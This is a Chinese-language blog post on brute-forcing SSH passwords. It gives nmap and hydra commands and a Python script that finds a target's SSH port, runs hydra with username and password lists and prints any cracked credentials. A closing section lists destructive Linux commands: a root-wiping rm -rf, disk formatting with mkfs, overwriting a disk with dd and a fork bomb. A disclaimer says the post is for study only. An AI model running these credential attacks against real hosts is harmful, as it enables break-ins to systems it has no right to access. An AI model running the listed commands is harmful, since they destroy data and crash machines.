Python: ssh爆破篇
Admin Lv3
  2024-09-20 20:46:27 2024-09-20 20:46  

既然MySQL可以爆,那么ssh又未尝不可呢?

扫描+爆破

流程与爆MySQL时如出一辙

1
2
3
export TARGET="target.com"
sudo nmap -sS -T4 -n -v $TARGET
sudo hydra -L username.txt -P password.txt -s <port> "ssh://${TARGET}"

Hydra的英文含义是九头蛇,暗示着其像九头蛇一样能灵活地针对不同的服务进行爆破

自动化

能自动化的东西就不要手动操作了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#!/usr/bin/env python3
import os
import re
import tempfile
import argparse

RED = '\033[1;31m'
GREEN = '\033[1;92m'
RESET = '\033[0m'

def scan(host):
    print(f'{RED}==== 扫描开始 ===={RESET}')
    print(f'目标: {host}')
    with tempfile.NamedTemporaryFile('w+') as outfile:
        os.system(f'nmap -sS -T4 -n -v -oN {outfile.name} {host}')
        output = outfile.read()
    mysql_line = re.search('.*ssh.*', output)
    if mysql_line != None:
        port = int(mysql_line.group(0).split('/')[0])
        print(f'{GREEN}发现ssh运行在端口{port}{RESET}')
        assert port in range(1, 65536)
        return port
    else:
        print(f'未发现ssh运行')
        return None

def explode(host, port, user_fname, passwd_fname):
    print(f'{RED}==== 爆破开始 ===={RESET}')
    print(f'目标: {host}:{port}')
    with tempfile.NamedTemporaryFile('w+') as outfile:
        os.system(f'hydra -L "{user_fname}" -P "{passwd_fname}" -s {port} -t 4 ssh://{host} > {outfile.name}')
        output = outfile.read()
    credential_line = re.search(r'login:.+', output)
    if credential_line != None:
        credentials = credential_line.group(0).split()
        user = credentials[1]
        passwd = credentials[3]
        print(f'{GREEN}爆破成功: 用户名 {user} 密码 {passwd}{RESET}')
        return (user, passwd)
    else:
        print('爆破失败')
        return None
    
def main():
    parser = argparse.ArgumentParser(description='Exploooosion!')
    parser.add_argument('host', type=str, help='target hostname or ip')
    parser.add_argument('-u', '--user-file', type=str, help='file for possible usernames')
    parser.add_argument('-p', '--passwd-file', type=str, help='file for possible passwords')
    args = parser.parse_args()
    
    scan_res = scan(args.host)
    if scan_res == None:
        exit(-1)
    port = scan_res
    explosion_res = explode(args.host, port, args.user_file, args.passwd_file)
    if explosion_res == None:
        exit(-1)
    username, passwd = explosion_res
    
if __name__ == '__main__':
    main()
1
sudo ./program $TARGET -u username.txt -p password.txt

四大禁术

相传Linux上有四个毁天灭地的指令

1
2
3
4
5
6
7
rm -rf --no-preserve-root /  # 删除根目录下所有文件

mkfs.ext /dev/${disk}  # 格式化硬盘

dd if=/dev/urandom of=/dev/${disk}  # 将随机数不断写入硬盘直到系统崩溃

:() { :|: & }; :  # 制造一个不断自我增殖索取IPC空间直至资源耗尽的进程

免责声明

以上内容仅供学习参考,本人不对读者使用上述指令直接或间接造成的破坏负责.

  1. 1. 扫描+爆破
  2. 2. 自动化
  3. 3. 四大禁术
  4. 4. 免责声明